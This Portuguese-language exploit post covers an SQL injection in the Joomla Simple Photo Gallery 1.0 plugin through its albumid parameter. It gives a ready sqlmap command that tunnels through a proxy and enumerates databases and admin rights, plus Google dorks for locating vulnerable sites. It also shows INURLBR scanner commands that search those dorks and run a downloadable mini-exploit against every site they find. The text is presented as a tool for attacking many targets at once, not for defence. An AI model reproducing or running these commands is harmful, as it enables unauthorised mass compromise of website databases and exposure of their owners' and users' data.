Usando miniexploit para explorar em massa vários alvos.
Date : 13-03-2015
Vendor Homepage: https://www.apptha.com/
Source Plugin: https://www.apptha.com/category/extension/joomla/simple-photo-gallery
Version : 1
Tested on : sqlmap
POC:
http://{$target}/index.php?option=com_simplephotogallery&view=images&albumid=[SQLI]
Comando SQLMAP de exploração:
sqlmap -u '{$target}/index.php?option=com_simplephotogallery&view=images&albumid=1' -p albumid --batch --dbms=MySQL --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --eta --answers='follow=N' --dbs --is-dba
DORK de pesquisa:
Dork Google 1: inurl:/com_simplephotogallery site:com
Dork Google 2: inurl:/com_simplephotogallery site:org
Dork Google 3: inurl:/com_simplephotogallery site:fr
Dork Google 4: inurl:/com_simplephotogallery/
Agora vamos organizar nosso comando INURLBR para executar nosso miniexploit.php
Primeiro vamos organizar o parâmetro --dork que captura seu filtro de busca.
--dork Defines which dork the search engine will use.Parâmetro organizado:
Example: --dork {dork}
Usage: --dork 'site:.gov.br inurl:php? id'
- Using multiples dorks:
Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
Usage: --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'
--dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/'
Baixar MINI exploit-SQLMAP / Joomla Simple Photo Gallery 1.0 - SQL injection:
http://pastebin.com/Gb5uhPKW
File: miniexploit.php
Baixar scanner INURLBR 1.0:
https://github.com/googleinurl/SCANNER-INURLBR
File: inurlbr.php
Executando:
./inurlbr.php --dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/' -s save.txt -q 1,6 --command-all "php miniexploit2.php '_TARGET_'"